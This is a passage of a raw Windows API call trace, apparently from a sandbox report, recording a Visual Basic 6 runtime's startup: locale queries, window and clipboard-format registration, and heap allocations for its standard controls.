lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa48 [0059.175] VirtualQuery (in: lpAddress=0x18fea8, lpBuffer=0x18fe8c, dwLength=0x1c | out: lpBuffer=0x18fe8c*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0059.175] GetUserDefaultLCID () returned 0x409 [0059.175] IsValidCodePage (CodePage=0x3a4) returned 1 [0059.176] IsValidCodePage (CodePage=0x3b5) returned 1 [0059.177] IsValidCodePage (CodePage=0x3b6) returned 1 [0059.178] IsValidCodePage (CodePage=0x3a8) returned 1 [0059.181] GetUserDefaultLangID () returned 0x409 [0059.181] GetSystemDefaultLangID () returned 0x570409 [0059.181] GetSystemMetrics (nIndex=42) returned 0 [0059.181] IMalloc:Alloc (This=0x757266bc, cb=0xa8) returned 0x57d580 [0059.181] IMalloc:GetSize (This=0x757266bc, pv=0x57d580) returned 0xa8 [0059.181] IMalloc:Alloc (This=0x757266bc, cb=0xc) returned 0x57cc08 [0059.181] GetCurrentThreadId () returned 0xa48 [0059.181] IMalloc:Alloc (This=0x757266bc, cb=0x3c) returned 0x579da0 [0059.181] IMalloc:Alloc (This=0x757266bc, cb=0x1c) returned 0x579668 [0059.429] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x18fe74 | out: phkResult=0x18fe74*=0x0) returned 0x2 [0059.430] IMalloc:Alloc (This=0x757266bc, cb=0x1c) returned 0x579690 [0059.430] GetCurrentThreadId () returned 0xa48 [0059.430] SetWindowsHookExA (idHook=-1, lpfn=0x729a1e09, hmod=0x0, dwThreadId=0xa48) returned 0x401a9 [0059.430] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x14) returned 0x2622078 [0059.430] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x80) returned 0x2622098 [0059.430] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x10) returned 0x2622120 [0059.430] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x2c) returned 0x2622138 [0059.430] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBMsoStdCompMgr", lpWndClass=0x18fdcc | out: lpWndClass=0x18fdcc) returned 0 [0059.430] RegisterClassA (lpWndClass=0x18fdcc) returned 0x98c13c [0059.430] CreateWindowExA (dwExStyle=0x0, lpClassName="VBMsoStdCompMgr", lpWindowName=0x0, dwStyle=0x80000000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x40124 [0059.430] NtdllDefWindowProc_A (hWnd=0x40124, Msg=0x81, wParam=0x0, lParam=0x18fa08) returned 0x1 [0059.430] NtdllDefWindowProc_A (hWnd=0x40124, Msg=0x83, wParam=0x0, lParam=0x18f9f4) returned 0x0 [0059.430] NtdllDefWindowProc_A (hWnd=0x40124, Msg=0x1, wParam=0x0, lParam=0x18fa08) returned 0x0 [0059.430] NtdllDefWindowProc_A (hWnd=0x40124, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0059.430] NtdllDefWindowProc_A (hWnd=0x40124, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0059.430] SetWindowLongA (hWnd=0x40124, nIndex=0, dwNewLong=39985308) returned 0 [0059.430] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x38) returned 0x2622170 [0059.431] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x26221b0 [0059.431] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x10) returned 0x26221d0 [0059.431] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0059.431] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0059.431] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0059.431] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0059.431] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0059.431] RegisterClipboardFormatA (lpszFormat="OwnerLink") returned 0xc003 [0059.431] RegisterClipboardFormatA (lpszFormat="FileName") returned 0xc006 [0059.431] CreateCompatibleDC (hdc=0x0) returned 0x2601025c [0059.431] GetCurrentObject (hdc=0x2601025c, type=0x7) returned 0x185000f [0059.431] CreateWindowExA (dwExStyle=0x0, lpClassName="VBFocusRT6", lpWindowName=0x0, dwStyle=0x40000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x50122, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x4011e [0059.431] NtdllDefWindowProc_A (hWnd=0x4011e, Msg=0x81, wParam=0x0, lParam=0x18fa98) returned 0x1 [0059.431] NtdllDefWindowProc_A (hWnd=0x4011e, Msg=0x83, wParam=0x0, lParam=0x18fa84) returned 0x0 [0059.431] NtdllDefWindowProc_A (hWnd=0x4011e, Msg=0x1, wParam=0x0, lParam=0x18fa98) returned 0x0 [0059.431] NtdllDefWindowProc_A (hWnd=0x4011e, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0059.431] NtdllDefWindowProc_A (hWnd=0x4011e, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0059.431] NtdllDefWindowProc_A (hWnd=0x50122, Msg=0x210, wParam=0x1, lParam=0x4011e) returned 0x0 [0059.431] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x26221e8 [0059.431] RtlAllocateHeap (HeapHandle=0x2780000, Flags=0x8, Size=0x114) returned 0x27807d0 [0059.432] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x5c) returned 0x2622208 [0059.432] GetCurrentThreadId () returned 0xa48 [0059.432] GetCurrentThreadId () returned 0xa48 [0059.432] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x10) returned 0x2622270 [0059.432] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x30) returned 0x2622288 [0059.432] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x434) returned 0x26222c0 [0059.432] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x434) returned 0x2622700 [0059.432] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x3c) returned 0x2622b40 [0059.432] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x2622b88 [0059.432] lstrlenA (lpString="VB") returned 2 [0059.432] lstrlenA (lpString="Printer") returned 7 [0059.432] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xb) returned 0x2622ca8 [0059.432] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0xdc) returned 0x2622cc0 [0059.432] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x28) returned 0x2622da8 [0059.432] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x2622dd8 [0059.432] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x28) returned 0x2622df8 [0059.432] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x2622e28 [0059.432] lstrlenA (lpString="VB") returned 2 [0059.432] lstrlenA (lpString="Form") returned 4 [0059.432] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x8) returned 0x2622f48 [0059.432] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x184) returned 0x2622f58 [0059.433] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x7c) returned 0x26230e8 [0059.433] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x2f8) returned 0x2623170 [0059.433] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x2623470 [0059.433] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x2623490 [0059.433] lstrlenA (lpString="VB") returned 2 [0059.433] lstrlenA (lpString="Screen") returned 6 [0059.433] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xa) returned 0x26235b0 [0059.433] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x2c) returned 0x26235c8 [0059.433] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xa0) returned 0x2623600 [0059.433] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x26236a8 [0059.433] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x26236c8 [0059.433] lstrlenA (lpString="VB") returned 2 [0059.433] lstrlenA (lpString="Clipboard") returned 9 [0059.433] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xd) returned 0x26237e8 [0059.433] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x1c) returned 0x2623800 [0059.433] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x68) returned 0x2623828 [0059.434] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x2623898 [0059.434] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x26238b8 [0059.434] lstrlenA (lpString="VB") returned 2 [0059.434] lstrlenA (lpString="MDIForm") returned 7 [0059.434] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xb) returned 0x26239d8 [0059.434] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x184) returned 0x26239f0 [0059.434] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x7c) returned 0x2623b80 [0059.434] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x2f8) returned 0x2623c08 [0059.434] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x2623f08 [0059.434] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x2623f28 [0059.434] lstrlenA (lpString="VB") returned 2 [0059.434] lstrlenA (lpString="App") returned 3 [0059.434] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x7) returned 0x2624048 [0059.434] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x84) returned 0x2624058 [0059.434] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x148) returned 0x26240e8 [0059.434] RtlReAllocateHeap (Heap=0x2620000, Flags=0x0, Ptr=0x2622da8, Size=0x50) returned 0x2624238 [0059.434] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x2622da8 [0059.434] RtlReAllocateHeap (Heap=0x2620000, Flags=0x0, Ptr=0x2622df8, Size=0x50) returned 0x2624290 [0059.435] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x26242e8 [0059.435] lstrlenA (lpString="VB") returned 2 [0059.435] lstrlenA (lpString="UserControl") returned 11 [0059.441] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xf) returned 0x2622df8 [0059.441] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x1e4) returned 0x2624408 [0059.441] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0xb0) returned 0x26245f8 [0059.441] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x3a4) returned 0x26246b0 [0059.441] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x2624a60 [0059.441] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x2624a80 [0059.441] lstrlenA (lpString="VB") returned 2 [0059.441] lstrlenA (lpString="PropertyPage") returned 12 [0059.441] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x10) returned 0x2622e10 [0059.441] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x190) returned 0x2624ba0 [0059.441] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x88) returned 0x2624d38 [0059.441] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x310) returned 0x2624dc8 [0059.442] lstrcmpiA (lpString1="VB.MDIForm", lpString2="VB.PropertyPage") returned -1 [0059.442] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x26250e0 [0059.442] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x2625100 [0059.442] lstrlenA (lpString="VB") returned 2 [0059.442] lstrlenA (lpString="UserDocument") returned 12 [0059.442] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x10) returned 0x2625220 [0059.442] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x1c8) returned 0x2625238 [0059.442] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0xa8) returned 0x2625408 [0059.442] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x370) returned 0x26254b8 [0059.442] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x2625830 [0059.442] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x20) returned 0x2625850 [0059.442] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x2625878 [0059.442] lstrlenA (lpString="VB") returned 2 [0059.442] lstrlenA (lpString="PictureBox") returned 10 [0059.442] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xe) returned 0x2625998 [0059.442] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x16c) returned 0x26259b0 [0059.442] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x68) returned 0x2625b28 [0059.443] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x2c8) returned 0x2625b98 [0059.443] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x2625e68 [0059.443] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x2625e88 [0059.443] lstrlenA (lpString="VB") returned 2 [0059.443] lstrlenA (lpString="Label") returned 5 [0059.443] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x9) returned 0x2625fa8 [0059.443] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x34) returned 0x2625fc0 [0059.443] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0xf0) returned 0x2626000 [0059.443] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x48) returned 0x26260f8 [0059.443] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x1f4) returned 0x2626148 [0059.443] RtlReAllocateHeap (Heap=0x2620000, Flags=0x0, Ptr=0x2624238, Size=0x78) returned 0x2626348 [0059.443] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x2624238 [0059.443] RtlReAllocateHeap (Heap=0x2620000, Flags=0x0, Ptr=0x2624290, Size=0x78) returned 0x26263c8 [0059.443] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x2626448 [0059.443] lstrlenA (lpString="VB") returned 2 [0059.443] lstrlenA (lpString="TextBox") returned 7 [0059.443] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xb) returned 0x2624258 [0059.443] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x38) returned 0x2624270 [0059.443] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x120) returned 0x2626568 [0059.443] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x60) returned 0x2626690 [0059.444] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x250) returned 0x26266f8 [0059.444] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x26242b0 [0059.444] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x2626950 [0059.444] lstrlenA (lpString="VB") returned 2 [0059.444] lstrlenA (lpString="Frame") returned 5 [0059.444] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x9) returned 0x26242d0 [0059.444] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x24) returned 0x2626a70 [0059.444] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0xb0) returned 0x2626aa0 [0059.444] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x34) returned 0x2626b58 [0059.444] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x184) returned 0x2626b98 [0059.444] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x2626d28 [0059.444] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x2626d48 [0059.444] lstrlenA (lpString="VB") returned 2 [0059.444] lstrlenA (lpString="CommandButton") returned 13 [0059.444] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x11) returned 0x2626e68 [0059.444] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x28) returned 0x26316f0 [0059.445] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0xd4) returned 0x2631720 [0059.445] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x44) returned 0x2631800 [0059.445] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x1c8) returned 0x2631850 [0059.445] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x2631a20 [0059.445] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x2631a40 [0059.445] lstrlenA (lpString="VB") returned 2 [0059.445] lstrlenA (lpString="CheckBox") returned 8 [0059.445] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2631b60 [0059.445] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x28) returned 0x2631b78 [0059.445] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0xec) returned 0x2631ba8 [0059.445] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x48) returned 0x2631ca0 [0059.446] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x1f8) returned 0x2631cf0 [0059.446] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x2631f08 [0059.446] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x2632af0 [0059.446] lstrlenA (lpString="VB") returned 2 [0059.446] lstrlenA (lpString="OptionButton") returned 12 [0059.446] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x10) returned 0x2632c10 [0059.446] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x28) returned 0x2632c28 [0059.446] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0xd4) returned 0x2632c58 [0059.446] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x4c) returned 0x2632d38 [0059.446] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x1c8) returned 0x2632d90 [0059.447] RtlReAllocateHeap (Heap=0x2620000, Flags=0x0, Ptr=0x2626348, Size=0xa0) returned 0x2632f60 [0059.447] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x2631f28 [0059.447] RtlReAllocateHeap (Heap=0x2620000, Flags=0x0, Ptr=0x26263c8, Size=0xa0) returned 0x2633008 [0059.447] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x26330b0 [0059.447] lstrlenA (lpString="VB") returned 2 [0059.447] lstrlenA (lpString="ComboBox") returned 8 [0059.447] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2626348 [0059.447] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x108) returned 0x26331d0 [0059.447] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x4c) returned 0x2626360 [0059.447] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x230) returned 0x26332e0 [0059.447] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x2631f48 [0059.448] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x2633530 [0059.448] lstrlenA (lpString="VB") returned 2 [0059.448] lstrlenA (lpString="ListBox") returned 7 [0059.448] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xb) returned 0x2635530 [0059.448] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x108) returned 0x2635918 [0059.448] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x54) returned 0x26263b8 [0059.448] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x230) returned 0x2635a28 [0059.448] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x2631f68 [0059.448] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x2633658 [0059.448] lstrlenA (lpString="VB") returned 2 [0059.448] lstrlenA (lpString="HScrollBar") returned 10 [0059.448] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xe) returned 0x2635548 [0059.448] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x24) returned 0x2626418 [0059.448] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x90) returned 0x2635c60 [0059.448] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x28) returned 0x2635cf8 [0059.448] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x144) returned 0x2635d28 [0059.448] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x2631f88 [0059.448] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x2633780 [0059.448] lstrlenA (lpString="VB") returned 2 [0059.449] lstrlenA (lpString="VScrollBar") returned 10 [0059.449] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xe) returned 0x2635560 [0059.449] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x24) returned 0x2635e78 [0059.449] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x90) returned 0x2635ea8 [0059.449] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x28) returned 0x2635f40 [0059.449] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x144) returned 0x2635f70 [0059.449] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x2631fa8 [0059.449] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x26338a8 [0059.449] lstrlenA (lpString="VB") returned 2 [0059.449] lstrlenA (lpString="Timer") returned 5 [0059.449] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x9) returned 0x2635578 [0059.449] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0xc) returned 0x2635590 [0059.449] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x30) returned 0x26360c0 [0059.449] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x4) returned 0x2622dc8 [0059.449] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x9c) returned 0x26360f8 [0059.450] RtlReAllocateHeap (Heap=0x2620000, Flags=0x0, Ptr=0x2632f60, Size=0xc8) returned 0x26361a0 [0059.450] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x2631fc8 [0059.450] RtlReAllocateHeap (Heap=0x2620000, Flags=0x0, Ptr=0x2633008, Size=0xc8) returned 0x2636270 [0059.450] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x26339d0 [0059.450] lstrlenA (lpString="VB") returned 2 [0059.450] lstrlenA (lpString="DriveListBox") returned 12 [0059.450] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x10) returned 0x26355a8 [0059.450] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x28) returned 0x2632f60 [0059.450] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0xc0) returned 0x2632f90 [0059.450] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x40) returned 0x2633058 [0059.450] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x1a0) returned 0x2636340 [0059.450] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x2631fe8 [0059.450] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x2633af8 [0059.450] lstrlenA (lpString="VB") returned 2 [0059.450] lstrlenA (lpString="DirListBox") returned 10 [0059.450] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xe) returned 0x26355c0 [0059.450] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x28) returned 0x26364e8 [0059.450] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0xc8) returned 0x2636518 [0059.450] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x50) returned 0x26365e8 [0059.450] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x1b0) returned 0x2636640 [0059.450] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x2632008 [0059.450] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x2633c20 [0059.451] lstrlenA (lpString="VB") returned 2 [0059.451] lstrlenA (lpString="FileListBox") returned 11 [0059.451] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xf) returned 0x26355d8 [0059.451] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x28) returned 0x26367f8 [0059.451] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0xec) returned 0x2636828 [0059.451] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x58) returned 0x2636920 [0059.451] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x1f8) returned 0x2636980 [0059.451] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x2632028 [0059.451] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x2633d48 [0059.451] lstrlenA (lpString="VB") returned 2 [0059.451] lstrlenA (lpString="Menu") returned 4 [0059.451] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x8) returned 0x26330a0 [0059.451] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x38) returned 0x2636b80 [0059.451] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x4) returned 0x2636bc0 [0059.451] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xb8) returned 0x2636bd0 [0059.451] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x2632048 [0059.451] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x2633e70 [0059.451] lstrlenA (lpString="VB") returned 2 [0059.451] lstrlenA (lpString="Shape") returned 5 [0059.451] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x9) returned 0x26355f0 [0059.451] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x1c) returned 0x2636c90 [0059.451] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x68) returned 0x2636cb8 [0059.451] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xfc) returned 0x2636d28 [0059.451] RtlReAllocateHeap (Heap=0x2620000, Flags=0x0, Ptr=0x26361a0, Size=0xf0) returned 0x2636e30 [0059.451] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x2632068 [0059.452] RtlReAllocateHeap (Heap=0x2620000, Flags=0x0, Ptr=0x2636270, Size=0xf0) returned 0x2636f28 [0059.452] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x2633f98 [0059.452] lstrlenA (lpString="VB") returned 2 [0059.452] lstrlenA (lpString="Line") returned 4 [0059.452] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x8) returned 0x26361a0 [0059.452] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632088 [0059.452] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x50) returned 0x26361b0 [0059.452] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xd0) returned 0x2636208 [0059.452] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x26320a8 [0059.452] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x26340c0 [0059.452] lstrlenA (lpString="VB") returned 2 [0059.452] lstrlenA (lpString="Image") returned 5 [0059.452] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x9) 